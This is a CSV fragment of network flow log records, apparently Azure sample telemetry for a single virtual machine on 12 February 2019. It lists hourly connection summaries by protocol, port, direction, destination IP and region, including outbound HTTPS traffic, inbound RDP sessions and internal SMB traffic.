+876,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 14:22:40.681,2019-02-12 13:00:48.000,2019-02-12 13:58:33.000,2019-02-12 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,18.0
+879,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 14:22:40.681,2019-02-12 13:10:56.000,2019-02-12 13:55:57.000,2019-02-12 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+875,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 14:22:40.681,2019-02-12 13:22:20.000,2019-02-12 13:22:20.000,2019-02-12 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['104.43.212.12'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,104.43.212.12,1.0
+880,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 14:22:40.681,2019-02-12 13:42:14.000,2019-02-12 13:42:14.000,2019-02-12 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+878,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 14:22:40.681,2019-02-12 13:46:48.000,2019-02-12 13:46:48.000,2019-02-12 14:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.107.4.50'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,13.107.4.50,1.0
+940,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 15:23:51.222,2019-02-12 14:00:08.000,2019-02-12 14:54:14.000,2019-02-12 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+941,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 15:23:51.222,2019-02-12 14:00:08.000,2019-02-12 14:54:14.000,2019-02-12 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+931,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 15:23:51.206,2019-02-12 14:02:46.000,2019-02-12 14:58:40.000,2019-02-12 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+932,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 15:23:51.206,2019-02-12 14:02:46.000,2019-02-12 14:58:40.000,2019-02-12 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+933,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 15:23:51.206,2019-02-12 14:10:57.000,2019-02-12 14:40:57.000,2019-02-12 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+936,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 15:23:51.206,2019-02-12 14:28:42.000,2019-02-12 14:28:42.000,2019-02-12 15:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['172.217.15.99'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,,eastus,172.217.15.99,1.0
+918,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.678,2019-02-12 15:00:09.000,2019-02-12 15:45:09.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+886,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.663,2019-02-12 15:04:13.000,2019-02-12 15:58:41.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '40.85.232.64', '13.71.172.128']",,,T,https,443.0,O,24.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,24.0
+887,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.663,2019-02-12 15:04:13.000,2019-02-12 15:58:41.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '40.85.232.64', '13.71.172.128']",,,T,https,443.0,O,24.0,0.0,0.0,0.0,canadacentral,eastus,40.85.232.64,24.0
+888,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.663,2019-02-12 15:04:13.000,2019-02-12 15:58:41.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '40.85.232.64', '13.71.172.128']",,,T,https,443.0,O,24.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,24.0
+882,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.663,2019-02-12 15:04:13.000,2019-02-12 15:43:21.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['104.43.212.12'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,centralus,eastus,104.43.212.12,4.0
+893,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.663,2019-02-12 15:25:57.000,2019-02-12 15:40:57.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+894,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.678,2019-02-12 15:35:36.000,2019-02-12 15:52:13.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['20.38.98.100', '23.96.64.84']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,6.0
+895,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 16:23:28.678,2019-02-12 15:35:36.000,2019-02-12 15:52:13.000,2019-02-12 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['20.38.98.100', '23.96.64.84']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus,eastus,23.96.64.84,6.0
+904,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 17:23:29.357,2019-02-12 16:00:10.000,2019-02-12 16:55:58.000,2019-02-12 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+903,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 17:23:29.357,2019-02-12 16:00:10.000,2019-02-12 16:55:58.000,2019-02-12 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+897,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 17:23:29.342,2019-02-12 16:04:27.000,2019-02-12 16:55:20.000,2019-02-12 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+896,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 17:23:29.342,2019-02-12 16:04:27.000,2019-02-12 16:55:20.000,2019-02-12 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+898,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 17:23:29.342,2019-02-12 16:10:58.000,2019-02-12 16:10:58.000,2019-02-12 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+900,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 17:23:29.342,2019-02-12 16:18:15.000,2019-02-12 16:18:15.000,2019-02-12 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+901,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 17:23:29.342,2019-02-12 16:56:19.000,2019-02-12 16:56:51.000,2019-02-12 17:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['131.107.147.209'],,,T,ms-wbt-server,3389.0,I,0.0,2.0,0.0,0.0,,eastus,131.107.147.209,2.0
+905,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.837,2019-02-12 17:00:06.000,2019-02-12 17:58:50.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,18.0
+906,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.837,2019-02-12 17:00:06.000,2019-02-12 17:58:50.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,18.0
+915,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.853,2019-02-12 17:00:10.000,2019-02-12 17:46:40.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+914,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.853,2019-02-12 17:00:10.000,2019-02-12 17:46:40.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+912,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.837,2019-02-12 17:09:35.000,2019-02-12 17:47:20.000,2019-02-12 18:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['131.107.147.209'],,,T,ms-wbt-server,3389.0,I,0.0,11.0,0.0,0.0,,eastus,131.107.147.209,11.0
+907,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.837,2019-02-12 17:10:58.000,2019-02-12 17:42:01.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+917,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.853,2019-02-12 17:26:19.000,2019-02-12 17:44:09.000,2019-02-12 18:00:00.000,IntraVNet,,,,,10.0.3.4,10.0.3.5,T,microsoft-ds,445.0,I,0.0,6.0,0.0,0.0,,eastus,10.0.3.4,6.0
+916,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.853,2019-02-12 17:26:19.000,2019-02-12 17:44:09.000,2019-02-12 18:00:00.000,IntraVNet,,,,,10.0.3.4,10.0.3.5,T,microsoft-ds,445.0,O,6.0,0.0,0.0,0.0,,eastus,10.0.3.5,6.0
+911,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.837,2019-02-12 17:29:15.000,2019-02-12 17:58:25.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.82.152.48', '20.38.98.100', '23.96.64.84']",,,T,https,443.0,O,8.0,0.0,0.0,0.0,eastus,eastus,23.96.64.84,8.0
+910,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.837,2019-02-12 17:29:15.000,2019-02-12 17:58:25.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.82.152.48', '20.38.98.100', '23.96.64.84']",,,T,https,443.0,O,8.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,8.0
+909,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 18:23:51.837,2019-02-12 17:29:15.000,2019-02-12 17:58:25.000,2019-02-12 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.82.152.48', '20.38.98.100', '23.96.64.84']",,,T,https,443.0,O,8.0,0.0,0.0,0.0,eastus,eastus,13.82.152.48,8.0
+871,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 19:23:52.321,2019-02-12 18:01:18.000,2019-02-12 18:46:19.000,2019-02-12 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+857,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 19:23:52.306,2019-02-12 18:04:04.000,2019-02-12 18:58:59.000,2019-02-12 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+858,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 19:23:52.306,2019-02-12 18:04:04.000,2019-02-12 18:58:59.000,2019-02-12 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+859,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 19:23:52.306,2019-02-12 18:27:16.000,2019-02-12 18:57:16.000,2019-02-12 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+861,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:00:10.000,2019-02-12 19:58:35.000,2019-02-12 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+862,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:00:10.000,2019-02-12 19:58:35.000,2019-02-12 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+865,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:00:55.000,2019-02-12 19:00:55.000,2019-02-12 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+869,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:00:58.000,2019-02-12 19:46:20.000,2019-02-12 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,3.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,3.0
+863,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:01:01.000,2019-02-12 19:01:01.000,2019-02-12 20:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['8.249.241.254'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,8.249.241.254,1.0
+864,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:12:16.000,2019-02-12 19:57:17.000,2019-02-12 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+866,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:31:20.000,2019-02-12 19:31:20.000,2019-02-12 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+868,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:56:09.000,2019-02-12 19:56:41.000,2019-02-12 20:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['131.107.147.209'],,,T,ms-wbt-server,3389.0,I,0.0,3.0,0.0,0.0,,eastus,131.107.147.209,3.0
+867,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 20:23:27.657,2019-02-12 19:56:49.000,2019-02-12 19:56:49.000,2019-02-12 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+950,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:18.779,2019-02-12 20:08:41.000,2019-02-12 20:57:28.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,17.0
+842,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.498,2019-02-12 20:08:41.000,2019-02-12 20:59:11.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,7.0
+843,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.498,2019-02-12 20:08:41.000,2019-02-12 20:59:11.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,7.0
+949,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:18.748,2019-02-12 20:08:41.000,2019-02-12 20:19:49.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.170.112', '52.173.28.179', '13.67.143.117']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,3.0
+947,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:18.748,2019-02-12 20:08:41.000,2019-02-12 20:19:49.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.170.112', '52.173.28.179', '13.67.143.117']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,centralus,eastus,52.165.170.112,3.0
+948,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:18.748,2019-02-12 20:08:41.000,2019-02-12 20:19:49.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.170.112', '52.173.28.179', '13.67.143.117']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,centralus,eastus,52.173.28.179,3.0
+951,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:18.779,2019-02-12 20:08:41.000,2019-02-12 20:57:28.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,17.0
+964,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:26.967,2019-02-12 20:08:42.000,2019-02-12 20:55:39.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+961,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:14.342,2019-02-12 20:08:45.000,2019-02-12 20:08:45.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+925,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.607,2019-02-12 20:08:46.000,2019-02-12 20:58:33.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.52.108.92', '40.77.228.69', '13.68.93.109']",,,T,https,443.0,O,15.0,0.0,0.0,0.0,eastus2,eastus,13.68.93.109,15.0
+924,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.607,2019-02-12 20:08:46.000,2019-02-12 20:58:33.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.52.108.92', '40.77.228.69', '13.68.93.109']",,,T,https,443.0,O,15.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,15.0
+923,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.607,2019-02-12 20:08:46.000,2019-02-12 20:58:33.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.52.108.92', '40.77.228.69', '13.68.93.109']",,,T,https,443.0,O,15.0,0.0,0.0,0.0,eastus2,eastus,65.52.108.92,15.0
+922,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.607,2019-02-12 20:08:46.000,2019-02-12 20:58:33.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.52.108.92', '40.77.228.69', '13.68.93.109']",,,T,https,443.0,O,15.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,15.0
+837,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.451,2019-02-12 20:08:47.000,2019-02-12 20:31:59.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '72.21.91.29', '8.253.45.249', '205.185.216.42', '23.223.3.100', '72.21.81.240', '23.48.36.78']",,,T,http,80.0,O,41.0,0.0,0.0,0.0,,eastus,23.48.36.78,41.0
+835,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.451,2019-02-12 20:08:47.000,2019-02-12 20:31:59.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '72.21.91.29', '8.253.45.249', '205.185.216.42', '23.223.3.100', '72.21.81.240', '23.48.36.78']",,,T,http,80.0,O,41.0,0.0,0.0,0.0,,eastus,23.223.3.100,41.0
+834,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.451,2019-02-12 20:08:47.000,2019-02-12 20:31:59.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '72.21.91.29', '8.253.45.249', '205.185.216.42', '23.223.3.100', '72.21.81.240', '23.48.36.78']",,,T,http,80.0,O,41.0,0.0,0.0,0.0,,eastus,205.185.216.42,41.0
+962,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:26.967,2019-02-12 20:08:47.000,2019-02-12 20:18:41.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.83.149.5', '13.83.148.235']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,westus,eastus,13.83.149.5,4.0
+963,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:26.967,2019-02-12 20:08:47.000,2019-02-12 20:18:41.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.83.149.5', '13.83.148.235']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,westus,eastus,13.83.148.235,4.0
+833,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.451,2019-02-12 20:08:47.000,2019-02-12 20:31:59.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '72.21.91.29', '8.253.45.249', '205.185.216.42', '23.223.3.100', '72.21.81.240', '23.48.36.78']",,,T,http,80.0,O,41.0,0.0,0.0,0.0,,eastus,8.253.45.249,41.0
+832,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.451,2019-02-12 20:08:47.000,2019-02-12 20:31:59.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '72.21.91.29', '8.253.45.249', '205.185.216.42', '23.223.3.100', '72.21.81.240', '23.48.36.78']",,,T,http,80.0,O,41.0,0.0,0.0,0.0,,eastus,72.21.91.29,41.0
+831,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.451,2019-02-12 20:08:47.000,2019-02-12 20:31:59.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '72.21.91.29', '8.253.45.249', '205.185.216.42', '23.223.3.100', '72.21.81.240', '23.48.36.78']",,,T,http,80.0,O,41.0,0.0,0.0,0.0,,eastus,13.107.4.50,41.0
+836,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.451,2019-02-12 20:08:47.000,2019-02-12 20:31:59.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '72.21.91.29', '8.253.45.249', '205.185.216.42', '23.223.3.100', '72.21.81.240', '23.48.36.78']",,,T,http,80.0,O,41.0,0.0,0.0,0.0,,eastus,72.21.81.240,41.0
+892,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.748,2019-02-12 20:09:00.000,2019-02-12 20:30:59.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.239.152.10', '40.121.3.131', '20.38.98.100', '168.62.32.212']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus,eastus,168.62.32.212,4.0
+891,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.748,2019-02-12 20:09:00.000,2019-02-12 20:30:59.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.239.152.10', '40.121.3.131', '20.38.98.100', '168.62.32.212']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,4.0
+890,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.748,2019-02-12 20:09:00.000,2019-02-12 20:30:59.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.239.152.10', '40.121.3.131', '20.38.98.100', '168.62.32.212']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus,eastus,40.121.3.131,4.0
